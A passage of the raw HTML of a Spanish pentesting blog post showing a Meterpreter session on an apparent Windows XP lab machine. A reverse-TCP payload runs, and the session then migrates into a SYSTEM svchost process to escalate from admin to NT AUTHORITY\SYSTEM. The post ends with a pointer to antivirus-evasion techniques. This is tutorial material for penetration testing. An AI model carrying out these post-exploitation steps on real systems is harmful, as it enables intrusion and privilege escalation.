&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;1272 &amp;nbsp;700 &amp;nbsp; svchost.exe &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;C:\WINDOWS\system32\svchost.exe&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;1328 &amp;nbsp;1576 &amp;nbsp;reverse_tcp_sin_encoding_p13.exe &amp;nbsp;x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; MNT_USER\admin &amp;nbsp; &amp;nbsp; &amp;nbsp; C:\Intercambio documentos\reverse_tcp_sin_encoding_p13.exe&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;1404 &amp;nbsp;700 &amp;nbsp; spoolsv.exe &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; NT AUTHORITY\SYSTEM &amp;nbsp;C:\WINDOWS\system32\spoolsv.exe&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;1576 &amp;nbsp;1548 &amp;nbsp;explorer.exe &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; MNT_USER\admin &amp;nbsp; &amp;nbsp; &amp;nbsp; C:\WINDOWS\Explorer.EXE&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;1644 &amp;nbsp;1576 &amp;nbsp;jusched.exe &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; MNT_USER\admin &amp;nbsp; &amp;nbsp; &amp;nbsp; C:\Archivos de programa\Java\jre6\bin\jusched.exe&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;1672 &amp;nbsp;1576 &amp;nbsp;vmtoolsd.exe &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; MNT_USER\admin &amp;nbsp; &amp;nbsp; &amp;nbsp; C:\Archivos de programa\VMware\VMware Tools\vmtoolsd.exe&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;1680 &amp;nbsp;1576 &amp;nbsp;ctfmon.exe &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; MNT_USER\admin &amp;nbsp; &amp;nbsp; &amp;nbsp; C:\WINDOWS\system32\ctfmon.exe&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;1824 &amp;nbsp;700 &amp;nbsp; svchost.exe &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; NT AUTHORITY\SYSTEM &amp;nbsp;C:\WINDOWS\System32\svchost.exe&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;1912 &amp;nbsp;700 &amp;nbsp; jqs.exe &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; NT AUTHORITY\SYSTEM &amp;nbsp;C:\Archivos de programa\Java\jre6\bin\jqs.exe&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;2000 &amp;nbsp;700 &amp;nbsp; svchost.exe &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; NT AUTHORITY\SYSTEM &amp;nbsp;C:\WINDOWS\system32\svchost.exe&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;meterpreter &amp;gt; getuid&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;Server username: MNT_USER\admin&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;meterpreter &amp;gt; ps&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;Process List&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;============&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;PID &amp;nbsp; PPID &amp;nbsp;Name &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Arch &amp;nbsp;Session &amp;nbsp; &amp;nbsp; User &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Path&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;--- &amp;nbsp; ---- &amp;nbsp;---- &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;---- &amp;nbsp;------- &amp;nbsp; &amp;nbsp; ---- &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; ----&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;0 &amp;nbsp; &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; [System Process] &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;4294967295 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;4 &amp;nbsp; &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; System &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;120 &amp;nbsp; 1576 &amp;nbsp;tcpviewRmod80.exe &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; MNT_USER\admin &amp;nbsp; &amp;nbsp; &amp;nbsp; C:\Intercambio documentos\tcpviewRmod80.exe&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;240 &amp;nbsp; 700 &amp;nbsp; vmtoolsd.exe &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; NT AUTHORITY\SYSTEM &amp;nbsp;C:\Archivos de programa\VMware\VMware Tools\vmtoolsd.exe&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;568 &amp;nbsp; 4 &amp;nbsp; &amp;nbsp; smss.exe &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; NT AUTHORITY\SYSTEM &amp;nbsp;\SystemRoot\System32\smss.exe&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;632 &amp;nbsp; 568 &amp;nbsp; csrss.exe &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; NT AUTHORITY\SYSTEM &amp;nbsp;\??\C:\WINDOWS\system32\csrss.exe&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;656 &amp;nbsp; 568 &amp;nbsp; winlogon.exe &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; NT AUTHORITY\SYSTEM &amp;nbsp;\??\C:\WINDOWS\system32\winlogon.exe&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;700 &amp;nbsp; 656 &amp;nbsp; services.exe &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; NT AUTHORITY\SYSTEM &amp;nbsp;C:\WINDOWS\system32\services.exe&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;712 &amp;nbsp; 656 &amp;nbsp; lsass.exe &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; NT AUTHORITY\SYSTEM &amp;nbsp;C:\WINDOWS\system32\lsass.exe&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;780 &amp;nbsp; 700 &amp;nbsp; alg.exe &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;C:\WINDOWS\System32\alg.exe&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;880 &amp;nbsp; 700 &amp;nbsp; vmacthlp.exe &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; NT AUTHORITY\SYSTEM &amp;nbsp;C:\Archivos de programa\VMware\VMware Tools\vmacthlp.exe&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;904 &amp;nbsp; 700 &amp;nbsp; svchost.exe &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; NT AUTHORITY\SYSTEM &amp;nbsp;C:\WINDOWS\system32\svchost.exe&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;1008 &amp;nbsp;1576 &amp;nbsp;notepad.exe &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; MNT_USER\admin &amp;nbsp; &amp;nbsp; &amp;nbsp; C:\WINDOWS\system32\NOTEPAD.EXE&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;1012 &amp;nbsp;700 &amp;nbsp; svchost.exe &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;C:\WINDOWS\system32\svchost.exe&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;1084 &amp;nbsp;1100 &amp;nbsp;wscntfy.exe &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; MNT_USER\admin &amp;nbsp; &amp;nbsp; &amp;nbsp; C:\WINDOWS\system32\wscntfy.exe&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;1100 &amp;nbsp;700 &amp;nbsp; svchost.exe &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; NT AUTHORITY\SYSTEM &amp;nbsp;C:\WINDOWS\System32\svchost.exe&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;1156 &amp;nbsp;700 &amp;nbsp; wmiapsrv.exe &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; NT AUTHORITY\SYSTEM &amp;nbsp;C:\WINDOWS\system32\wbem\wmiapsrv.exe&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;1188 &amp;nbsp;700 &amp;nbsp; svchost.exe &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;C:\WINDOWS\system32\svchost.exe&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;1272 &amp;nbsp;700 &amp;nbsp; svchost.exe &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;C:\WINDOWS\system32\svchost.exe&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;1328 &amp;nbsp;1576 &amp;nbsp;reverse_tcp_sin_encoding_p13.exe &amp;nbsp;x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; MNT_USER\admin &amp;nbsp; &amp;nbsp; &amp;nbsp; C:\Intercambio documentos\reverse_tcp_sin_encoding_p13.exe&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;1404 &amp;nbsp;700 &amp;nbsp; spoolsv.exe &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; NT AUTHORITY\SYSTEM &amp;nbsp;C:\WINDOWS\system32\spoolsv.exe&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;1576 &amp;nbsp;1548 &amp;nbsp;explorer.exe &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; MNT_USER\admin &amp;nbsp; &amp;nbsp; &amp;nbsp; C:\WINDOWS\Explorer.EXE&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;1644 &amp;nbsp;1576 &amp;nbsp;jusched.exe &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; MNT_USER\admin &amp;nbsp; &amp;nbsp; &amp;nbsp; C:\Archivos de programa\Java\jre6\bin\jusched.exe&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;1672 &amp;nbsp;1576 &amp;nbsp;vmtoolsd.exe &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; MNT_USER\admin &amp;nbsp; &amp;nbsp; &amp;nbsp; C:\Archivos de programa\VMware\VMware Tools\vmtoolsd.exe&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;1680 &amp;nbsp;1576 &amp;nbsp;ctfmon.exe &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; MNT_USER\admin &amp;nbsp; &amp;nbsp; &amp;nbsp; C:\WINDOWS\system32\ctfmon.exe&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;1824 &amp;nbsp;700 &amp;nbsp; svchost.exe &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; NT AUTHORITY\SYSTEM &amp;nbsp;C:\WINDOWS\System32\svchost.exe&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;1912 &amp;nbsp;700 &amp;nbsp; jqs.exe &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; NT AUTHORITY\SYSTEM &amp;nbsp;C:\Archivos de programa\Java\jre6\bin\jqs.exe&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;2000 &amp;nbsp;700 &amp;nbsp; svchost.exe &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; NT AUTHORITY\SYSTEM &amp;nbsp;C:\WINDOWS\system32\svchost.exe&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;meterpreter &amp;gt; migrate 2000&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;[*] Migrating from 120 to 2000...&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;[*] Migration completed successfully.&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;meterpreter &amp;gt; getuid&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;Server username: NT AUTHORITY\SYSTEM&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;meterpreter &amp;gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;
&lt;div&gt;
&lt;br /&gt;
Y para finalizar, aquellos que se hayan quedado con el gusanito de continuar y conseguir que el antivirus no detecte su "&lt;b&gt;ejecutable&lt;/b&gt;" le recomiendo que lea detenidamente el siguiente artículo: "&lt;a href="http://schierlm.users.sourceforge.net/avevasion.html" target="_blank"&gt;Facts and myths about antivirus evasion with Metasploit&lt;/a&gt;", seguro que no os defraudará.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style="background-color: white; color: #3a3a3a; font-family: Arial, sans-serif; font-size: 12px; line-height: 18px;"&gt;
&lt;span style="border: none; font-size: xx-small; list-style: none; margin: 0px; outline: none; padding: 0px;"&gt;&amp;gt;ST2Labs&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-color: white; color: #3a3a3a; font-family: Arial, sans-serif; font-size: 12px; line-height: 18px;"&gt;
#Pentesting #Rulez&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-S1Nt6dDSSCI/UUsSlA9bZcI/AAAAAAAAELU/rKRBbonz9as/s1600/ST2Labs_botton_head.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-S1Nt6dDSSCI/UUsSlA9bZcI/AAAAAAAAELU/rKRBbonz9as/s1600/ST2Labs_botton_head.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
